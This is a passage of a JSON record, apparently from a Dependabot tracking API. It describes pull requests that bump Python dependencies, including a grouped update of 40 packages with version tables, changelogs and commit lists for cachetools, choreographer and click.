href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.8.0...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/ywjung/zenith/pull/45","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ywjung%2Fzenith/issues/45","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/45/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-01T18:28:07.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4565417266","node_id":"PR_kwDOSlL6KM7her48","number":12,"state":"closed","title":"deps(py): bump the python-minor group across 1 directory with 40 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-08T05:41:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T18:28:07.000Z","updated_at":"2026-06-08T05:41:41.000Z","time_to_close":558812,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(py): bump","group_name":"python-minor","update_count":40,"packages":[{"name":"cachetools","old_version":"7.0.5","new_version":"7.1.4","repository_url":"https://github.com/tkem/cachetools"},{"name":"choreographer","old_version":"1.2.1","new_version":"1.3.0","repository_url":"https://github.com/plotly/choreographer"},{"name":"click","old_version":"8.3.2","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"decorator","old_version":"5.2.1","new_version":"5.3.1","repository_url":"https://github.com/micheles/decorator"},{"name":"duckdb","old_version":"1.5.2","new_version":"1.5.3","repository_url":"https://github.com/duckdb/duckdb-python"},{"name":"flask-wtf","old_version":"1.2.2","new_version":"1.3.0","repository_url":"https://github.com/pallets-eco/flask-wtf"},{"name":"greenlet","old_version":"3.3.2","new_version":"3.5.1","repository_url":"https://github.com/python-greenlet/greenlet"},{"name":"idna","old_version":"3.11","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"9.12.0","new_version":"9.14.0","repository_url":"https://github.com/ipython/ipython"},{"name":"jedi","old_version":"0.19.2","new_version":"0.20.0","repository_url":"https://github.com/davidhalter/jedi"},{"name":"kaleido","old_version":"1.2.0","new_version":"1.3.0","repository_url":"https://github.com/plotly/kaleido"},{"name":"markdown-it-py","old_version":"4.0.0","new_version":"4.2.0","repository_url":"https://github.com/executablebooks/markdown-it-py"},{"name":"matplotlib-inline","old_version":"0.2.1","new_version":"0.2.2","repository_url":"https://github.com/ipython/matplotlib-inline"},{"name":"mcp","old_version":"1.27.0","new_version":"1.27.2","repository_url":"https://github.com/modelcontextprotocol/python-sdk"},{"name":"py-lets-be-rational","old_version":"1.0.1","new_version":"1.1.2","repository_url":"https://github.com/vollib/py_lets_be_rational"},{"name":"py-vollib","old_version":"1.0.1","new_version":"1.0.12","repository_url":"https://github.com/vollib/py_vollib"},{"name":"narwhals","old_version":"2.19.0","new_version":"2.22.0","repository_url":"https://github.com/narwhals-dev/narwhals"},{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"orjson","old_version":"3.11.8","new_version":"3.11.9","repository_url":"https://github.com/ijl/orjson"},{"name":"parso","old_version":"0.8.6","new_version":"0.8.7","repository_url":"https://github.com/davidhalter/parso"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"plotly","old_version":"6.6.0","new_version":"6.7.0","repository_url":"https://github.com/plotly/plotly.py"},{"name":"pydantic","old_version":"2.12.5","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-core","old_version":"2.41.5","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-engineio","old_version":"4.13.1","new_version":"4.13.2","repository_url":"https://github.com/miguelgrinberg/python-engineio"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"python-socketio","old_version":"5.16.1","new_version":"5.16.2","repository_url":"https://github.com/miguelgrinberg/python-socketio"},{"name":"python-telegram-bot","old_version":"22.6","new_version":"22.7","repository_url":"https://github.com/python-telegram-bot/python-telegram-bot"},{"name":"pytz","old_version":"2026.1.post1","new_version":"2026.2","repository_url":"https://github.com/stub42/pytz"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"tornado","old_version":"6.5.5","new_version":"6.5.6","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"traitlets","old_version":"5.14.3","new_version":"5.15.0","repository_url":"https://github.com/ipython/traitlets"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"wcwidth","old_version":"0.6.0","new_version":"0.7.0","repository_url":"https://github.com/jquast/wcwidth"},{"name":"wheel","old_version":"0.46.3","new_version":"0.47.0","repository_url":"https://github.com/pypa/wheel"},{"name":"wtforms","old_version":"3.2.1","new_version":"3.2.2","repository_url":"https://github.com/pallets-eco/wtforms"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor group with 40 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cachetools](https://github.com/tkem/cachetools) | `7.0.5` | `7.1.4` |\n| [choreographer](https://github.com/plotly/choreographer) | `1.2.1` | `1.3.0` |\n| [click](https://github.com/pallets/click) | `8.3.2` | `8.4.1` |\n| [decorator](https://github.com/micheles/decorator) | `5.2.1` | `5.3.1` |\n| [duckdb](https://github.com/duckdb/duckdb-python) | `1.5.2` | `1.5.3` |\n| [flask-wtf](https://github.com/pallets-eco/flask-wtf) | `1.2.2` | `1.3.0` |\n| [greenlet](https://github.com/python-greenlet/greenlet) | `3.3.2` | `3.5.1` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.17` |\n| [ipython](https://github.com/ipython/ipython) | `9.12.0` | `9.14.0` |\n| [jedi](https://github.com/davidhalter/jedi) | `0.19.2` | `0.20.0` |\n| [kaleido](https://github.com/plotly/kaleido) | `1.2.0` | `1.3.0` |\n| [markdown-it-py](https://github.com/executablebooks/markdown-it-py) | `4.0.0` | `4.2.0` |\n| [matplotlib-inline](https://github.com/ipython/matplotlib-inline) | `0.2.1` | `0.2.2` |\n| [mcp](https://github.com/modelcontextprotocol/python-sdk) | `1.27.0` | `1.27.2` |\n| [py-lets-be-rational](https://github.com/vollib/py_lets_be_rational) | `1.0.1` | `1.1.2` |\n| [py-vollib](https://github.com/vollib/py_vollib) | `1.0.1` | `1.0.12` |\n| [narwhals](https://github.com/narwhals-dev/narwhals) | `2.19.0` | `2.22.0` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [orjson](https://github.com/ijl/orjson) | `3.11.8` | `3.11.9` |\n| [parso](https://github.com/davidhalter/parso) | `0.8.6` | `0.8.7` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [plotly](https://github.com/plotly/plotly.py) | `6.6.0` | `6.7.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.12.5` | `2.13.4` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.41.5` | `2.47.0` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-engineio](https://github.com/miguelgrinberg/python-engineio) | `4.13.1` | `4.13.2` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.30` |\n| [python-socketio](https://github.com/miguelgrinberg/python-socketio) | `5.16.1` | `5.16.2` |\n| [python-telegram-bot](https://github.com/python-telegram-bot/python-telegram-bot) | `22.6` | `22.7` |\n| [pytz](https://github.com/stub42/pytz) | `2026.1.post1` | `2026.2` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.5.5` | `6.5.6` |\n| [traitlets](https://github.com/ipython/traitlets) | `5.14.3` | `5.15.0` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.48.0` |\n| [wcwidth](https://github.com/jquast/wcwidth) | `0.6.0` | `0.7.0` |\n| [wheel](https://github.com/pypa/wheel) | `0.46.3` | `0.47.0` |\n| [wtforms](https://github.com/pallets-eco/wtforms) | `3.2.1` | `3.2.2` |\n\n\nUpdates `cachetools` from 7.0.5 to 7.1.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tkem/cachetools/blob/master/CHANGELOG.rst\"\u003ecachetools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev7.1.4 (2026-05-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor unit test improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.3 (2026-05-18)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.2 (2026-05-16)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMinor documentation improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eModernize build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.1 (2026-05-03)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eVarious type stub improvements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.0 (2026-05-01)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type stubs based on the work of the good people at \u003ccode\u003etypeshed \u0026lt;https://github.com/python/typeshed/tree/main/stubs/cachetools/\u0026gt;\u003c/code\u003e__.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate unit tests.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.0.6 (2026-04-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor code improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate project URLs.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate CI environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/48284d73d0a8834c9c50f8d41bb99e6f93b2dfed\"\u003e\u003ccode\u003e48284d7\u003c/code\u003e\u003c/a\u003e Release v7.1.4.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/55ea96b88a485fca9effae0f838186274f00897c\"\u003e\u003ccode\u003e55ea96b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c5439fe5dc883220b59469e450dbcbf9f4c2e52d\"\u003e\u003ccode\u003ec5439fe\u003c/code\u003e\u003c/a\u003e Add threading tests for lock-only decorators.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/91828fccd629d426157a165d38563614ba06a875\"\u003e\u003ccode\u003e91828fc\u003c/code\u003e\u003c/a\u003e Run threading tests unconditionally with timeout.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/16952edb1eb2d2ced7601e12db722008e5156912\"\u003e\u003ccode\u003e16952ed\u003c/code\u003e\u003c/a\u003e Release v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/92dd756b93813d1ddfe70893e9c219342a52e19a\"\u003e\u003ccode\u003e92dd756\u003c/code\u003e\u003c/a\u003e Prepare v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/ced08f52ef792a010b8171715c7842da4e11b9ac\"\u003e\u003ccode\u003eced08f5\u003c/code\u003e\u003c/a\u003e Improve cachetools.func type stubs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/d809d7be5a222effd3663c33baaaee3802972daa\"\u003e\u003ccode\u003ed809d7b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c84b5e5be3d33a32d33f0988b524fb86de1e44f2\"\u003e\u003ccode\u003ec84b5e5\u003c/code\u003e\u003c/a\u003e Release v7.1.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/39ad61c1db56600fe903f3c4216996c491e775bf\"\u003e\u003ccode\u003e39ad61c\u003c/code\u003e\u003c/a\u003e Prepare v7.1.2.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tkem/cachetools/compare/v7.0.5...v7.1.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `choreographer` from 1.2.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/choreographer/blob/main/CHANGELOG.txt\"\u003echoreographer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003ev1.3.0\nv1.3.0rc2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCheck path validity for browser with is_file()\u003c/li\u003e\n\u003cli\u003eAdd option --verify_local in choreo_diagnose and fix local reporting logic\nv1.3.0rc1\u003c/li\u003e\n\u003cli\u003eWe now look for old download path as well as new download path\nv1.3.0rc0\u003c/li\u003e\n\u003cli\u003eChange to process group for better killing of multi-process chrome\u003c/li\u003e\n\u003cli\u003eAdd argument to Session/Target \u003ccode\u003esend_command(..., *, with_perf: bool)\u003c/code\u003e to\nreturn timing information about browser write/read.\u003c/li\u003e\n\u003cli\u003eUpdate default chrome from 135.0.7011.0/1418433 to 144.0.7527.0/1544685\u003c/li\u003e\n\u003cli\u003eFix: New chrome takes longer/doesn't populate targets right away, so add a\nretry loop to populate targets\u003c/li\u003e\n\u003cli\u003eAlter \u003ccode\u003eget_chrome\u003c/code\u003e verbose to print whole JSON\u003c/li\u003e\n\u003cli\u003eChange chrome download path to use XDG cache dir\u003c/li\u003e\n\u003cli\u003eDon't download chrome if we already have that version: add force argument\u003c/li\u003e\n\u003cli\u003eRemove unused system inspection code\u003c/li\u003e\n\u003cli\u003eAdd a set of helper functions to await for tab loading and send javascript\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/92147b1ccf024ae647f29ebf43057564011e06c9\"\u003e\u003ccode\u003e92147b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/296\"\u003e#296\u003c/a\u003e from plotly/cam/update-changelog-v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/8851fc919bc7dfb27a48541543f1ff195c48eda3\"\u003e\u003ccode\u003e8851fc9\u003c/code\u003e\u003c/a\u003e Updates to release version v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/3128bddf909381a2b4205f0e28c0c3cb8b13498c\"\u003e\u003ccode\u003e3128bdd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/288\"\u003e#288\u003c/a\u003e from plotly/andrew/more_local_logic\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/a6f478e00fb81ad22db7c7c1d31028fb4ab20311\"\u003e\u003ccode\u003ea6f478e\u003c/code\u003e\u003c/a\u003e Add to changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/953e19ad5dc395a3554cfbaf25599a8a3db6d933\"\u003e\u003ccode\u003e953e19a\u003c/code\u003e\u003c/a\u003e Check browser is file whwen checking path validity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/d062e355b819b84e57060d4e48fbe2aa6f063259\"\u003e\u003ccode\u003ed062e35\u003c/code\u003e\u003c/a\u003e Change default setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/c0c97fc64a55c773dd7484674996cf55d74249a1\"\u003e\u003ccode\u003ec0c97fc\u003c/code\u003e\u003c/a\u003e Add option to verify local with choreo_diagnose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/7ade1922269a6999c06f2ff92b34a1770bba6d3e\"\u003e\u003ccode\u003e7ade192\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/286\"\u003e#286\u003c/a\u003e from plotly/andrew/roadmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/edf284c8973dd9dc7f7b2f77a53481fe6f0d2671\"\u003e\u003ccode\u003eedf284c\u003c/code\u003e\u003c/a\u003e Update Roadmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/c1b7abce535feb79748c888ba1130b985c13eb3f\"\u003e\u003ccode\u003ec1b7abc\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/plotly/choreographer/compare/v1.2.1...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.2 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.rst\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. :issue:\u003ccode\u003e3458\u003c/code\u003e :issue:\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. :issue:\u003ccode\u003e3277\u003c/code\u003e :pr:\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion\nresult. :issue:\u003ccode\u003e3015\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. :issue:\u003ccode\u003e3487\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. :issue:\u003ccode\u003e3449\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a 